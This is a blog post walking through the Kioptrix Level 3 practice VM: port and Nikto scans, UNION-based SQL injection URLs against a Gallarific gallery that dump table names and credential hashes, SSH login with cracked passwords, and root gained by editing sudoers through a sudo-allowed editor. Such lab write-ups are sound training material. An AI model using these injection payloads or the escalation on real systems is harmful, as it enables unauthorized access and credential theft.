Saturday, February 4, 2017

Kioptrix level 3

With another busy week behind its due for another post. Continuing with the Kioptrix series I've selected Kioptrix 3 for this weekend. After downloading the VM I noticed the readme.txt in the download:

DISCLAIMER!
We at Kioptrix are not responsible for any damaged directly, or indirectly,
caused by using this system. We suggest you do not connect this installation
to the Internet.
It is, after all, a vulnerable setup.
Please keep this in mind when playing the game.

This machine is setup to use DHCP.
Before playing the game, please modify your attacker's hosts file.

<ip>    kioptrix3.com
This challenge contains a Web Application.


If you have any questions, please direct them to:
comms[at]kioptrix.com


Hope you enjoy this challenge.
-Kioptrix Team


My first go at this VM was fraught with frustration. Its not until I looked at the readme.txt and noticed this note about the hosts file. Adding this line does help. To help with things I've started using KeepNote for recording my progress with each vulnerable VM.

After booting up Kioptrix 3 and Kali I start with the usual:

root@kali:~# nmap 192.168.0.198

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-04 21:35 EST
Nmap scan report for 192.168.0.198
Host is up (0.000066s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:C7:D9:56 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

------------------------------------------------------------------------------
root@kali:~# nmap -T4 -A -v 192.168.0.198
.

.
.
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...








Kioptrix 3 has Apache running on it. Lets take a look:


We have a Blog page, Login and if you this page there is a gallery system. For this VM I've also decided to try out a new tool (for me), Nikto.
I also ran a scan on the gallery page:
root@kali:~# nikto -host http://192.168.0.198/gallery
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.198
+ Target Hostname:    192.168.0.198
+ Target Port:        80
+ Start Time:         2017-02-04 19:01:13 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /gallery/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /gallery/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /gallery/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /gallery/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /gallery/db.sql, inode: 630988, size: 3573, mtime: Sat Oct 10 15:43:52 2009
+ OSVDB-3092: /gallery/db.sql: Database SQL?
+ /gallery/login.php: Admin login page/section found.
+ 7534 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2017-02-04 19:01:28 (GMT-5) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested



These two highlighted parts caught my attention. Lets see what they show in the browser:

So I just got the DB structure. I'm going to save this for later. Further down on this page I also get this gem:


CREATE TABLE IF NOT EXISTS `gallarific_users` (
  `userid` int(11) NOT NULL auto_increment,
 `username` varchar(100) NOT NULL default '',
`password` varchar(100) NOT NULL default '',
  `usertype` enum('superuser','normaluser') NOT NULL default 'superuser',
  `firstname` varchar(100) NOT NULL default '',
  `lastname` varchar(100) NOT NULL default '',
  `email` varchar(255) NOT NULL default '',
  `datejoined` int(11) NOT NULL default '0',
  `website` varchar(255) NOT NULL default '',
  `issuperuser` tinyint(4) NOT NULL default '0',
  `photo` varchar(100) NOT NULL default '',
  `joincode` varchar(20) NOT NULL default '',
  PRIMARY KEY  (`userid`)
)
;

After clicking on the Press  Room I notice a drop down menu for sorting options. After clicking it notice 'id' in the url.

http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos

Throwing in a single quote (http://kioptrix3.com/gallery/gallery.php?id=') into the url returns this error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by parentid,sort,name' at line 1Could not select category

After a lot of playing around I get an SQL injection to work:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20SELECT%201,2,3,4,5,6

Changing the SQL Injection to:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20SELECT%201,@@version,3,4,5,6
    5.0.51a-3ubuntu5.4

Since I've learned the table and column names from earlier I can get the username and password from the DB:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20SELECT%20userid,username,password,4,5,6%20FROM%20gallarific_users

   admin//n0t7t1k4

This could be used for logging into the site, but I don't think this is a dev account. To prove this I tried logging in with this username. No luck.  Time to look for another table:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20ALL%20SELECT%201,2,group_concat%28table_name%29,4,5,6%20from%20information_schema.tables

Gets us:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,
SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,dev_accounts,
gallarific_comments,gallarific_galleries,gallarific_photos,gallarific_settings,gallari

Changing my earlier injection to:
http://kioptrix3.com/gallery/gallery.php?id=1%20UNION%20ALL%20SELECT%201,2,concat%28username,char%2858%29,password%29,4,5,6%20FROM%20dev_accounts

loneferret:5badcaf789d3d1d09794d8f021f40f0e
dreg:0d3eccfb887aabd50f243b3f155c0f85

From the blog site loneferret is the new admin for the site. This is the username I want.

I used crackstation.net to crack these hashes:
With this now I try to login to phpmyadmin and the lotusCMS login pages, no luck. BUT SSH works:
An ls of loneferret's home directory shows:
checksec.sh and CompanyPolicy.README

checksec.sh description shows:
# Name    : checksec.sh
# Version : 1.4
# Author  : Tobias Klein
# Date    : January 2011
# Download: http://www.trapkit.de/tools/checksec.html
# Changes : http://www.trapkit.de/tools/checksec_changes.txt
#
# Description:
#
# Modern Linux distributions offer some mitigation techniques to make it
# harder to exploit software vulnerabilities reliably. Mitigations such
# as RELRO, NoExecute (NX), Stack Canaries, Address Space Layout
# Randomization (ASLR) and Position Independent Executables (PIE) have
# made reliably exploiting any vulnerabilities that do exist far more
# challenging. The checksec.sh script is designed to test what *standard*
# Linux OS and PaX (http://pax.grsecurity.net/) security features are being
# used.
#
# As of version 1.3 the script also lists the status of various Linux kernel
# protection mechanisms.


CompanyPolicy.README shows:
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
loneferret@Kioptrix3:~$


To get root, I need to sudo su. but this isn't allowed at the moment. I need to edit the sudoers file. ht will do the trick.
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers                                                                                                                                                                                                                                                                                                                                                                                     
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ export TERM=xterm
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers

After a quick Google search of the error I found the answer on this stackoverflow.com page:
http://stackoverflow.com/questions/6804208/nano-error-error-opening-terminal-xterm-256color





I've edited the file so loneferret can do all the things that root can.

loneferret@Kioptrix3:~$ sudo su
[sudo] password for loneferret:
root@Kioptrix3:/home/loneferret# whoami
root
root@Kioptrix3:/home/loneferret# cd
root@Kioptrix3:~# ls
Congrats.txt  ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS:
http://www.lotuscms.org

Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.

root@Kioptrix3:~#


No comments:

Post a Comment